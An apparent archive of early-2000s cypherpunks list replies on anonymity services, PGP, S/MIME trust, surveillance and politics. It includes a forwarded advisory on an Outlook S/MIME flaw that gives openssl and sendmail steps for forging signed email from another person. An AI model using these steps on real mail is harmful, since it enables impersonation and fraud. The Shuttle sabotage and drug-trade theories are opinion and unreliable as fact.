Running a cypherpunks list node?
If one were inclined to host a cypherpunks list node, where would one obtain the necessary information? -MW-
Re: Terror Reading
On Sun, 31 Aug 2003, Anonymous wrote: Some librarians are probably now thinking they have a patriotic duty to see what people are reading and to report any suspicious behavior. Part of the intent of the Patriot Act and the Library Awareness Program was to bamboozle the nation's librarians into acting as the kind of ward watchers that were once so common in the Soviet Union (the babushkas who sat on each floor of apartment buildings and filed reports on the comings and goings of their flock). The purpose of this is purely a show and indoctrination. 1. No self-respecting terrorist would go to a fucking library to do terror reading (maybe there is something positive here - I think that we should get protected by pigs from extremely dumb terorists.) The risk is not one terrorists have to fear. The biggest problem with the librarian narc program is the same as most of these anti-terrorism measures: completely innocent people are harassed, arrested, or placed under suspicion. You won't catch a terrorist learning to be evil at a library, but you might wrongfully snare an innocent citizen who happens to have an interest in bad books. How long until this program is extended to include anyone checking out any book that some part of the US law enforcement body deems bad? If you read Pikhal, do you end up on a watch list? -MW-
Re: Schneier at toorcon 2003
On Mon, 25 Aug 2003, Major Variola (ret) wrote: I'm told by an organizer that Bruce Schneier will be speaking at toorcon in San Diego this year. See www.toorcon.org for info. This is of interest why?
Re: Popular Net anonymity service back-doored (fwd)
On Fri, 22 Aug 2003, Thomas Shaddack wrote: Yet more info. Let's not overreact before we get complete dataset. It is worth noting that the notice mentioned below was placed on the JAP website only after the news of the back channel was made public on Usenet and the various security mailing lists. Not the most laudable behavior, to say the least. -MW- -- Forwarded message -- Date: Fri, 22 Aug 2003 09:34:27 +0200 Subject: Re: Popular Net anonymity service back-doored From: nordi [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] On Thursday, 21. August 2003 14:05, Thomas C. Greene wrote: It's not secure, and claiming that it is taints anything else they may be doing on behalf of users. They're *still* saying it's impossible for anyone to intercept users' traffic or identify them. Actually, this is absolutely not what they are saying. When you visit the website of the JAP project http://anon.inf.tu-dresden.de/ it says in big, red letters: Aus aktuellem Anlass weisen wir noch einmal ausdr|cklich daraufhin, dass sich die JAP Software in Entwicklung befindet und noch nicht maximale Sicherheit bietet. (siehe unten ... ) In English this means something like Due to recent events we explicitly inform you of the fact that the JAP software is still being developed and does not yet provide maximum security. (see below ...) As I said: big, red letters at the top of their main page. And when you click that see below link it says there Attention! [...] This version does NOT yet implement the security features described above and desired by us. But it does alread protect you against atackers that control the net only locally at one place such as [...] the owner of a mix. So by the time you download that software you should have already read _two_ statements telling you that JAP is not as secure as it could be. It also tells you that in the current configuration, the JAP people can see all your traffic if they want to: Note that it says it will protect you against the owner of _A_ mix. But if you take the Dresden-Dresden cascade, the JAP people obviously control _all_ of them. And the above statement already implies that in this case, JAP cannot protect you. If you still want to use JAP, http://www.heise.de/newsticker/data/uma-20.08.03-000/ (in German) tells you how to do it securely: simply use just a single mix that is not controlled by the JAP project and you'll be fine. The court order is only valid for the JAP people, so everybody else in Germany (and elsewhere of course) can offer a non-backdoored mix which will make the cascade secure. This actually means that all cascades but the Dresden-Dresden one are secure. MfG nordi -- Denn der Menschheit drohen Kriege, gegen welche die vergangenen wie armselige Versuche sind, und sie werden kommen ohne jeden Zweifel, wenn denen, die sie in aller Vffentlichkeit vorbereiten, nicht die Hdnde zerschlagen werden. Bertolt Brecht, 1952
RE: pgp in internet cafe (webpgp)
On Sun, 23 Mar 2003, Lucky Green wrote: The question is - do I have to code this or has someone already done it ? http://www.lokmail.com/ It is inadvisable that anyone use Lokmail. The implications of a trust-us encrypted mail service are obvious, and the people behind Lokmail are of dubious integrity. If you're looking for secure web-based PGP, look at www.hushmail.com.
Re: Shuttle Humor
On Sat, 1 Feb 2003, Eric Cordian wrote: The look on your fellow astronauts' faces right before the grenade you are holding explodes --PRICELESS Please. If we're going to toss around conspiracy theories, let's make sure they are sane. I am having a hard time imagining a scenario in which it would benefit the Israeli cause to blow up their first astronaut in space. Perhaps if it could be made to appear as a terroristic act by the evil ragheads, maybe Israel would attempt a stunt like this, to further the American/Israeli brothers in arms mentality. But there appears to be no such scenario that is remotely plausible. The only theory that I find remotely worth pursuing is that the shuttle was bringing something back to earth that didn't want to come down. Tim seems to have thoughts about this -- how easily could a satellite be designed with a self-destruct upon reentering Earth's atmosphere device? The motivation would certainly be there. I can't see China perpetrating a terrorist act against the US at this point in time, but I could see China taking steps to prevent the successful theft of its military surveillance devices. This isn't to say that force majeure isn't the most likely culprit here. Space travel is inherently dangerous, and I'm honestly surprised that less than 2% of our shuttle flights have resulted in catastrophe. -MW-
Re: Matt Blaze Does Master Keys
On Thu, 23 Jan 2003, Eric Cordian wrote: Nonetheless, it's an interesting story. I should note that the high security building I live regards master keying doors as a bad thing to do, and they have a key board and a signout sheet in the main office. http://www.nytimes.com/2003/01/23/business/23LOCK.html l/p=cpunx/cpunx I have to think that Matt is being satirical here. This is hardly news, as any locksmith can tell you. (This is one of the reasons that some lock companies restrict the sale of key blanks, and others (such as Medeco or ASSA) require keys be made by the original supplier, using unique key blanks.) -MW-
Re: cloning as heresy (Re: Fresh Hell)
On Sat, 18 Jan 2003, Harmon Seaver wrote: Ah, now I see. Before, I was thinking that he was talking about the passage where Onan pulls out and spills his seed on the ground, which, somehow, became a prescription against masturbation, although reading it, especially in context, is clearly just about pulling out. Or possibly against birth-control. Thou shalt not pull out., thus saith the Lord, or in any other way deprive thy partner of the power of thy final orgasmic thrusting. 8-) Weird, isn't it, that this became so associated with masturbation that a very successful company -- Onan -- even would choose their name for generators, i.e., self power or do it alone, etc., from that passage. Even weirder that it doesn't have the slightest thing to do with jacking off, but with someone not willing to accept their (at the time) societal duty to support his dead brother's wife and father her children. The irony, of course, is what the Catholic Church would have to say if the brother-in-laws of modern widows resumed this practice. -MW-
Re: Brinworld: Samsung SCH-V310 camcorder phone
On Mon, 13 Jan 2003, Tim May wrote: Samsung unveil new 3G camcorder phone http://www.3gnewsroom.com/3g_news/jan_03/news_2906.shtml Hardly Brinworld. And T-Mobile has had it for awhile. Why is warmed-over technology news given headlines? ... and they lie about it being 3G (which doesn't exist yet.) -MW-
3G Phones (was: Re: Brinworld: Samsung SCH-V310 camcorder phone)
On Tue, 14 Jan 2003, Steve Mynott wrote: ... and they lie about it being 3G (which doesn't exist yet.) It's a CDMA2000 phone which is 3G. 3G networks exist in many parts of the world, although behind schedule in other parts. Hmm. I actually can't find any specs on that phone's max speed. The CDMA2000 service being offered by Sprint and Verison in the US does not meet the criteria for 3G. CDMA2000 1x as defined by the ITU is, a 3G standard. Keep in mind, however, that in order to be 3G by the ITU definition, a standard needs to deliver data rates of a minimum of 144 Kbps. The top speed I've seen advertised for CDMA2000 deployments is 70 Kbps. Is CDMA2000 being used outside North America? I thought GSM/GPRS was the dominant standard in Europe and Asia. (GPRS is never 3G.) -MW-
Re: Indo European Origins
On Thu, 9 Jan 2003, Tyler Durden wrote: Soma? Despite the fact that I've read large chunks of the Rig Vedas, I don't remember anything called Soma (unless this is a Brave New World Reference). Of course, the Bhagavad Gita is a subsection of the Mahabaratabut I don't imagine this is what you are referring to... Then you need to read the Vedas [there is only one Rig-Vega, which is the oldest of the four Vedas] again more closely. Soma is mentioned repeatedly throughout the Vedic hyms. Soma is both an intoxicating elixir, and the god that represents it. Soma is sometimes thought to have been alcohol, a mead-like substance, marijuana, psychedelic mushrooms, or other nourishing substances. (The composition of soma is hotly debated by scholars -- I have no firm answer myself.) Soma is said to have nourishing properties, and even the power to instill immortality. (C.f. the eclipse myth of the Hindu demon Rahu.) And, as you mention, soma is a prozac/valium or MDEA-like socially acceptable drug in Huxley's classic, as well as a brand name for the muscle relaxant carisoprodol (whose effects are a great disappointment, if one is expecting it to be anything like the Hindu or Huxley substance of the same name.) The original poster was, no doubt, refering to the original Soma, however. -MW-
Re: I crypt you
On Tue, 24 Dec 2002, Anonymous wrote: (unrelated, I noticed that there is no un-crippled free version of PGP for windows XP any more - 8.0 beta expired) What about PGP 8.0 Freeware? That isn't crippled. (It doesn't include automatic email plugins, which many think are a bad idea anyway, and doesn't include PGPdisk, which is a great product, but addresses issues other than email privacy in transit. So what is wrong with PGP 8.0 Freeware? -MW-
Re: War on drugs...
On 13 Dec 2002, Sleeping Vayu wrote: Uh...I'd point out that this is no coincidence. The Conpiracy Theorist would say that the War on Drugs was precisely the CIA's way to keep its own drug prices high and continue funding their own little activites. Plausible. Oh, and aside from the fatass oil pipeline they've wanted to build in Afghanistan, guess another little resource that Afghanistan has produced in the past (and that the Taliban had cracked down on)? Yeah--you got it--Poppies...and now that the Warlords are back in charge the cash crop is back. Remember that it was the US which encouraged the Taliban to crack down on the cultivation of Afghanistan poppies. A gift of several million US dollars convinced the Taliban to ban the farming of poppies, depriving the Afghani farmers of their livlihood, while not impacting the world drug trade (the Taliban wisely retained stock-piles of processed crop, ready for price-fixing.) Oil might have something to do with the US's interest in being Afghanistan's puppeteer, but it is unlikely that opium does as well. -MW-
Re: JYA ping
On Sun, 6 Oct 2002, Morlock Elloi wrote: It seems to be strange that he wrote at [EMAIL PROTECTED], an address which is also given on his web page, but ping pipeline.com doesn't work. Sorry to resort to ad hominem, but you're a technological imbecile. There is this magic thing in DNS called MX record. Read about it. Not to mention the practice of blocking ICMP at the firewall, which would result in pings not working. -MW-
Re: All your canadians are belong to us
On Sat, 21 Sep 2002, Major Variola (ret) wrote: At 11:08 AM 9/21/02 -0400, Greg Vassie wrote: says Dr Ann Coavoukian, the commissioner of information and privacy in Ontario, U.S.A. People are lying and vendors don't know what is false [or As a resident of Ontario, Canada, I'm quite surprised to learn that Ontario has been annexed by the United States. Ontario, California? No, Ontario, Canada: http://www.ipc.on.ca/ http://www.cfp2002.org/advisoryboard/cavoukian.shtml -MW-
Re: Free Copy of Applied Cryptography
On Wed, 11 Sep 2002, Lisa wrote: http://www.cacr.math.uwaterloo.ca/hac/ http://developers.slashdot.org/developers/02/09/11/1616231.shtml?tid=93 Handbook of Applied Cryptography Posted by michael on Wednesday September 11, 12:24PM from the complete-from-adelman-to-zimmerman dept. cconnell writes The Handbook of Applied Cryptography is now available free (for personal use) on the Internet. This is a $100 book. Note also the companion C source code for most of the crypto algorithms, written by James Pate Williams. There is some very cool code here! That's Handbook of Applied Cryptography, arguably a much better book than Applied Cryptography. It has been available in its entirety from that website for at least two years now. I suppose this is somewhat timely news, by Slashdot-i-cant- spell-zimmermann dept standards, anyway. -MW-
S/MIME in Outlook -- fucked.
... just making certain Lucky has seen this gem. -- Forwarded message -- Date: Mon, 2 Sep 2002 10:37:23 -0700 (PDT) From: Mike Benham [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Outlook S/MIME Vulnerability === Outlook S/MIME Vulnerability 09/02/02 Mike Benham [EMAIL PROTECTED] http://www.thoughtcrime.org === Abstract Outlook's S/MIME implementation is vulnerable to the certificate chain spoofing attack, despite Microsoft's claim that IE is the only affected application. The vulnerability allows anyone to forge the digital signature on an email that is to be viewed with Outlook. No warnings are given, no dialogs are shown. Description For a complete description of the certificate chain attack, see: http://online.securityfocus.com/archive/1/286290 As with the IE SSL vulnerability, an attacker generates a bad certificate chain: [Issuer:VeriSign | Subject:VeriSign] [Issuer:VeriSign | Subject:www.thoughtcrime.org] [Issuer:www.thoughtcrime.org | Subject:Bill [EMAIL PROTECTED]] Outlook fails to check the Basic Constraints on the intermediate certificate and accepts the leaf certificate as valid. = Severity As it stands, there is virtually no difference between signed and unsigned email in Outlook. Unless carefully inspected, signed email in Outlook is essentially meaningless. This also applies to any signed email received over the past 5+ years. Prudent users who must continue using Outlook for signed email should manually inspect and verify received certificate chains. Affected Clients Mozilla is NOT vulnerable. Outlook Express 5 is vulnerable. (Tested on fully patched Win2k SP3 system) Exploit 1) Put a valid CA-signed certificate and private key in a file middle.pem (If you don't have a valid CA-signed certificate, there's one bundled with sslsniff: http://www.thoughtcrime.org/ie.html) 2) Generate a fake leaf certificate signing request: a) openssl genrsa -out key.pem 1024 b) openssl req -new -key key.pem -out leaf.csr 3) Sign the CSR with your intermediate certificate: a) openssl x509 -req -in leaf.csr -CA middle.pem -CAkey middle.pem -CAcreateserial -out leaf.pem 4) Sign a spoofed mail message: a) openssl smime -sign -in mail.txt -text -out mail.msg -signer leaf.pem -inkey key.pem -certfile middle.pem -from [EMAIL PROTECTED] -to [EMAIL PROTECTED] -subject SM Exploit 5) Send the mail: a) cat mail.msg | sendmail [EMAIL PROTECTED] I encourage everyone to send Bill Gates an email from himself. =) == Vendor Notification Status Microsoft knows about this, of course, but isn't even sure whether to call this a 'vulnerability'. Right. - Mike -- http://www.thoughtcrime.org
Re: Mitigating Dangers of Compromised Anonymity
On Fri, 30 Aug 2002, Adam Shostack wrote: I'd like to suggest that while this may be fun, usability and getting millions of users to see that remailers are useful to them is a more useful goal. I agree, although I fail to see how working on this would interfere with that goal in any way. The anonymity set provided by the current extant systems is too small to protect anyone against anyone who is willing to kill or disappear people as part of their attacks against the remailers. I find this disbelievable. I suspect there are many groups which do not have the capability of defeating the remailer system who would still like to see it eliminated. Willingness to kill or disappear people isn't necessarily tied to technical capability, though I agree that entities which can defeat the remailer network without disappearing anyone are unlikely to pose a threat to the remops. If our goal is to make remailers harder to defeat, however, beforehand might be the right time to address the problem of missing remailer operators. (Incidently, I could see this having uses outside the remailer operator world.) Oh, yeah, and incidentally, if you build this system, the attacker can simply add a bit of rubber hosing to their remop elimination program. To pry the signing key out of the victim? That's a personal how much torture can I take question for the victim to ask himself. He knows he'll be permanently disappeared after coughing up the private key. In many cases also it might be far harder to rubber-hose someone than simply cause an accident. -MW-
Re: Discouraging credential sharing with Mojo
On Wed, 21 Aug 2002, Anonymous wrote: Clearly we need a new approach. Here is a suggestion for a simple solution which will give everyone an important secret that they will avoid sharing. At birth each person will be issued a secret key. This will be called his Mojo. [snip] Now all that is needed is a simple change to the law so that knowing someone's Mojo makes him your slave. Virtually all cultures have held the mythological belief that all beings with souls have a True Name, and that knowledge of one's true name leads to power over him. (This isn't really surprising, since the True Name concept features prominently in Babylonian mythology, from which the myths of nearly all other civilizations have sprung.) For instance, knowing the True Name of a god could result in one being granted godly powers, or immortality (cf: Isis learning the True Name of Ra in Egyptian mythology). In Greek (and neo-pagan) nature myths, speaking the true name of a landscape object could give the speaker protection or favors from the spirit inhabiting the object. In Hebrew, Essene, and Islamic mythology, as well as Celtic, Pacific Island, and Norse tales, the True Name theme appears repeatedly. Etc. It sounds like you wish to revive this superstition, but instead make it cryptographically enforcable. Trust in the laws of mathematics and men, not of gods? Welcome to the Church of Strong Cryptography. Please join me in supporting this important reform. Just say, I want my Mojo! Sometimes, I wonder if some of these posts are not intended to be as ironic as they appear. -MW-
Re: Signing as one member of a set of keys
On Fri, 9 Aug 2002, Anonymous User wrote: This program can be used by anonymous contributors to release partial information about their identity - they can show that they are someone from a list of PGP key holders, without revealing which member of the list they are. Maybe it can help in the recent controvery over the identity of anonymous posters. It's a fairly low-level program that should be wrapped in a nicer UI. I'll send a couple of perl scripts later that make it easier to use. === Most delightful. Thank you for reminding us that Cypherpunks do indeed write code. More comments in a bit. [MW SNIP] ++multisig v1.0 pEsBwalpBRxWyJR8tkYm6qR27UW9IT6Vg8SlOHIsEkk04RJvoSy0cy4ISFCq6vDX 5ub6c+MYi/UoyR6tI7oqpMu1abcXWm2DkfDiCsD6jQddVkiiYdG7Bih8JWdWmp5l AgzqUoz14671/ezmWSrPNsTNKV96+ZLEanZsqfkpQcnZpLkWVpJzQFe0VgDQ64b2 +e2efrbknLFq0FTdX7Sh3qzAfzNYYgADmeOxDoTm9sb6T0fULf1P7mjiN2LZXuEW m/8QvksaQi9KGa/0xN2m0heNtS1cfsTa+NJz8XYyG/tnMy7+mvI3c3lrnz+6Dpyp pbNwaX+12VcqtfNec9faoq8RJgFxmSO/ZfMOGM8cFBQ75ZOaoBJP5ObHZ/63FFh5 Wh5GzwJjQs0vLwpM3iF6G+IixEqAQYisUdCopP1wXCLgltDM6l7jRlXxNDj0AXQ1 eQJolo32vemcy8Z8GAn5tpQHmJwpdzZpboWRQY53pD4mVnEMN4GBC1mhbbI2z+Oh lPglqmmy3p4D+psNU1rlNv6yH/L0PgcuW7taVpbopjl4HLuJdWcKHJlXish3D/jb eoQ856fYFZ/omGiO9x1D0BsnGFLZVWob4OIZRzO/Pc49VIhFy5NsV2zuozStId89 [...] */ That [...] you see is an artifact of the anonymous remailer you were using. Mixmaster, I believe, gives the option to truncate messages which appear to include binary encoded data. PGP messages are explicitly allowed to be sent. Immediate problem: we can't verify your signature. Short term solution: find a remailer that allows binary posting. Long term solution: perhaps contact the Mixmaster authors and ask them to explicitly allow multisig data? -MW-
Re: why OpenPGP is preferable to S/MIME (Re: NAI pulls out the DMCA stick)
On Thu, 23 May 2002, Adam Back wrote: On Thu, May 23, 2002 at 03:05:49PM -0400, Adam Shostack wrote: So what if we create the Cypherpunks Root CA, which (either) signs what you submit to it via a web page, or publish the secret key? This won't achieve the desired effect because it will just destroy the S/MIME trust mechanism. S/MIME is based on the assumption that all CAs are trustworthy. Which is, of course, a major flaw. S/MIME is of some value for internal corporate email for companies who can run their own CA. (The sort of people who used to be Xcert's customers.) S/MIME is of very little value outside of a closed intranet environment, for the simple reason that public CAs are mostly incompetent, untrustworthy, or both. -MW-
Re: Joe Sixpack doesn't run Linux
On Thu, 23 May 2002, Curt Smith wrote: This is a fairly accurate description of the situation, but neglects to emphasize that the reason [1-cypherpunk] bothers convincing [2-coerced associate] to use encrypted e-mail is because [1] understands its importance and is attempting to share/spread that understanding. Yes, [1] understands its importance. I think you overestimate the amount of effort put forth by [1] to spread the Word, though. While evangelizing strong crypto might be second-nature to a cypherpunk, the other members of [1] are standards-setters because they must be. They require [2] to use strong crypto, because it is their asses if they don't. They don't care, and don't need to care, if [2] understands the value of strong crypto, as long as [2] uses it in communication with [1]. Although [3-Joe Sixpack] may not understand or appreciate encryption, [3]'s support is helpful to protect [1]'s cryptography rights. Furthermore once [3] has crypto, [3] will resist attempts to take it away (along with his six pack, etc.). With this, I fully agree. The challenge is to design a system that satisfies the security requirements for [1]'s threat model and the usability requirements for [3]'s attention span. It has yet to be done. All attempts thus far have been lucky if they only fail at one of those two goals. Most fail at both. -MW-
NAI pulls out the DMCA stick
NAI is now taking steps to remove the remaining copies of PGP from the Internet, not long after announcing that the company will not release its fully completed Mac OS X and Windows XP versions, and will no longer sell any copies of its PGP software. Do we still believe this was a pure cost-cutting measure? From: http://crypto.radiusnet.net/archive/pgp/index.html Date: Thu, 9 May 2002 13:01:40 -0500 From: [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] Subject: Network Associates, Inc. DMCA Notice [ The following text is in the iso-8859-1 character set. ] [ Your display is set for the US-ASCII character set. ] [ Some characters may be displayed incorrectly. ] DMCA NOTICE OF INFRINGING MATERIAL Via Email: [EMAIL PROTECTED]; [EMAIL PROTECTED]; Re: Digital Millennium Copyright Act Notice Dear Radiusnet.net I am writing on behalf of Networks Associates, Inc. and its affiliated companies (collectively, Network Associates). As you may know, Network Associates is a leading provider of computer software for network security and management. Among its business units are such well-known names as McAfee, PGP Security, Sniffer Technologies, and Magic Solutions. We have learned that Radiusnet.Net is providing access on its system or network to material that infringes the copyrighted work of Network Associates. In particular, I refer you to the web pages located at http://crypto.radiusnet.net/archive/pgp which contains links from your site that provide unauthorized copies of NAI proprietary materials, including software. The material on this web site infringes Network Associates' valuable copyrights. Accordingly, Network Associates requests that Radiusnet.Net immediately remove or disable access to this infringing material. You should know that Network Associates takes its intellectual property rights seriously. By bringing this matter to your attention, we hope that Radiusnet.Net will act promptly to remedy this problem. We have a good faith belief that use of the material described above is not authorized by Network Associates, any of its agents, or the law. To the best of our knowledge, the information contained in this notification is accurate. Under penalty of perjury, I am authorized to act on behalf of Network Associates. If you have any questions or concerns, please contact me at the address listed above. You can also reach me by e-mail at [EMAIL PROTECTED] or by phone at +1 301-947-7150. Thank you for your anticipated cooperation. Sincerely, Peter Beruk Director, Anti-Piracy Programs Peter Beruk Director, Anti-Piracy Programs Network Associates, Inc. Phone: +1.301.947.7150 Fax: +1.301.527.0482
